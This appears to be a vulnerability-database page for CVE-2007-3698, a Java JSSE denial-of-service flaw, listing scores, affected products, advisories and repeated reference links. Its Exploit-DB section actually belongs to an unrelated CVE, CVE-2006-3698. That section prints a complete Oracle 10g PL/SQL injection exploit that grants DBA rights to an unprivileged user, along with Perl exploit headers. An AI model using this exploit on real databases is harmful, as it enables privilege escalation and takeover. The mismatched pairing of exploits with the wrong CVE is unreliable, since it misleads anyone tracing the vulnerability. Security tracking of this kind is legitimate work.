CVE-2007-3698
published 2007-07-11CVE-2007-3698: The Java Secure Socket Extension (JSSE) in Sun JDK and JRE 6 Update 1 and earlier, JDK and JRE 5.0 Updates 7 through 11, and SDK and JRE 1.4.2_11 through…
PriorityP430high7.8CVSS 2.0
AVNACLAuNCNINAC
EPSS
3.82%
88.8th percentile
The Java Secure Socket Extension (JSSE) in Sun JDK and JRE 6 Update 1 and earlier, JDK and JRE 5.0 Updates 7 through 11, and SDK and JRE 1.4.2_11 through 1.4.2_14, when using JSSE for SSL/TLS support, allows remote attackers to cause a denial of service (CPU consumption) via certain SSL/TLS handshake requests.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hitachi | ucosminexus_application_server_enterprise | — | — |
| hitachi | ucosminexus_application_server_standard | — | — |
| hitachi | ucosminexus_client | — | — |
| hitachi | ucosminexus_developer_professional | — | — |
| hitachi | ucosminexus_developer_standard | — | — |
| hitachi | ucosminexus_operator | — | — |
| hitachi | ucosminexus_service_architect | — | — |
| hitachi | ucosminexus_service_platform | — | — |
| sun | jdk | — | — |
| sun | jdk | — | — |
| sun | jre | — | — |
| sun | jre | — | — |
| sun | jre | — | — |
| sun | jre | — | — |
| sun | jre | — | — |
| sun | jre | — | — |
| sun | sdk | — | — |
| sun | sdk | — | — |
| sun | sdk | — | — |
| sun | sdk | — | — |
CVSS provenance
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
vendor_redhat7.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7f3h-668h-399r: The Java Secure Socket Extension (JSSE) in the Hitachi Cosminexus Developer's Kit for Java in various Hitachi Cosminexus 7
ghsa_unreviewed·2022-05-01·CVSS 7.8
CVE-2007-5281 [HIGH] CWE-20 GHSA-7f3h-668h-399r: The Java Secure Socket Extension (JSSE) in the Hitachi Cosminexus Developer's Kit for Java in various Hitachi Cosminexus 7
The Java Secure Socket Extension (JSSE) in the Hitachi Cosminexus Developer's Kit for Java in various Hitachi Cosminexus 7.5 products before 07-50-01, when using JSSE for SSL/TLS support, allows remote attackers to cause a denial of service via certain SSL/TLS handshake requests. NOTE: this may be the same as CVE-2007-3698.
GHSA
GHSA-5p3v-g8h5-7gg9: The Java Secure Socket Extension (JSSE) in Sun JDK and JRE 6 Update 1 and earlier, JDK and JRE 5
ghsa_unreviewed·2022-05-01
CVE-2007-3698 [HIGH] GHSA-5p3v-g8h5-7gg9: The Java Secure Socket Extension (JSSE) in Sun JDK and JRE 6 Update 1 and earlier, JDK and JRE 5
The Java Secure Socket Extension (JSSE) in Sun JDK and JRE 6 Update 1 and earlier, JDK and JRE 5.0 Updates 7 through 11, and SDK and JRE 1.4.2_11 through 1.4.2_14, when using JSSE for SSL/TLS support, allows remote attackers to cause a denial of service (CPU consumption) via certain SSL/TLS handshake requests.
Red Hat
Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition
vendor_redhat·2007-07-10·CVSS 7.8
CVE-2007-3698 [HIGH] Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition
Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition
The Java Secure Socket Extension (JSSE) in Sun JDK and JRE 6 Update 1 and earlier, JDK and JRE 5.0 Updates 7 through 11, and SDK and JRE 1.4.2_11 through 1.4.2_14, when using JSSE for SSL/TLS support, allows remote attackers to cause a denial of service (CPU consumption) via certain SSL/TLS handshake requests.
No detection rules found.
Exploit-DB
Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)
exploitdb·2007-02-26
CVE-2006-3698 Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)
Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)
---
#!/usr/bin/perl
#
# Remote Oracle KUPW$WORKER.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/440439
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db
Exploit-DB
Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission
exploitdb·2007-02-22
CVE-2006-3698 Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission
Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission
---
#!/usr/bin/perl
#
# Remote Oracle KUPW$WORKER.MAIN exploit (10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/440439
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 22 17:48:27 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-worker.pl line 94.
# [
Exploit-DB
Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
exploitdb·2007-01-23
CVE-2006-3698 Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
---
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/
select *
from user_role_privs
;
// milw0rm.com [2007-01-23]
http://dev2dev.bea.com/pub/advisory/249http://docs.info.apple.com/article.html?artnum=307177http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01269450http://lists.apple.com/archives/Security-announce/2007/Dec/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-04/msg00010.htmlhttp://osvdb.org/36663http://secunia.com/advisories/26015http://secunia.com/advisories/26221http://secunia.com/advisories/26314http://secunia.com/advisories/26631http://secunia.com/advisories/26645http://secunia.com/advisories/26933http://secunia.com/advisories/27203http://secunia.com/advisories/27635http://secunia.com/advisories/27716http://secunia.com/advisories/28056http://secunia.com/advisories/28115http://secunia.com/advisories/28777http://secunia.com/advisories/28880http://secunia.com/advisories/29340http://secunia.com/advisories/29897http://sunsolve.sun.com/search/document.do?assetkey=1-26-102997-1http://support.novell.com/techcenter/psdb/0c36b6416afc3868b8b1b9012955e323.htmlhttp://www.cisco.com/en/US/products/products_security_response09186a008088bd19.htmlhttp://www.cisco.com/warp/public/707/cisco-sr-20070725-jsse.shtmlhttp://www.gentoo.org/security/en/glsa/glsa-200709-15.xmlhttp://www.redhat.com/support/errata/RHSA-2007-0818.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0956.htmlhttp://www.redhat.com/support/errata/RHSA-2007-1086.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0100.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0132.htmlhttp://www.securityfocus.com/bid/24846http://www.securitytracker.com/id?1018357http://www.vupen.com/english/advisories/2007/2495http://www.vupen.com/english/advisories/2007/2660http://www.vupen.com/english/advisories/2007/3009http://www.vupen.com/english/advisories/2007/3861http://www.vupen.com/english/advisories/2007/4224https://exchange.xforce.ibmcloud.com/vulnerabilities/35333https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10634http://dev2dev.bea.com/pub/advisory/249http://docs.info.apple.com/article.html?artnum=307177http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01269450http://lists.apple.com/archives/Security-announce/2007/Dec/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-04/msg00010.htmlhttp://osvdb.org/36663http://secunia.com/advisories/26015http://secunia.com/advisories/26221http://secunia.com/advisories/26314http://secunia.com/advisories/26631http://secunia.com/advisories/26645http://secunia.com/advisories/26933http://secunia.com/advisories/27203http://secunia.com/advisories/27635http://secunia.com/advisories/27716http://secunia.com/advisories/28056http://secunia.com/advisories/28115http://secunia.com/advisories/28777http://secunia.com/advisories/28880http://secunia.com/advisories/29340http://secunia.com/advisories/29897http://sunsolve.sun.com/search/document.do?assetkey=1-26-102997-1http://support.novell.com/techcenter/psdb/0c36b6416afc3868b8b1b9012955e323.htmlhttp://www.cisco.com/en/US/products/products_security_response09186a008088bd19.htmlhttp://www.cisco.com/warp/public/707/cisco-sr-20070725-jsse.shtmlhttp://www.gentoo.org/security/en/glsa/glsa-200709-15.xmlhttp://www.redhat.com/support/errata/RHSA-2007-0818.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0956.htmlhttp://www.redhat.com/support/errata/RHSA-2007-1086.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0100.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0132.htmlhttp://www.securityfocus.com/bid/24846http://www.securitytracker.com/id?1018357http://www.vupen.com/english/advisories/2007/2495http://www.vupen.com/english/advisories/2007/2660http://www.vupen.com/english/advisories/2007/3009http://www.vupen.com/english/advisories/2007/3861http://www.vupen.com/english/advisories/2007/4224https://exchange.xforce.ibmcloud.com/vulnerabilities/35333https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10634
2007-07-11
Published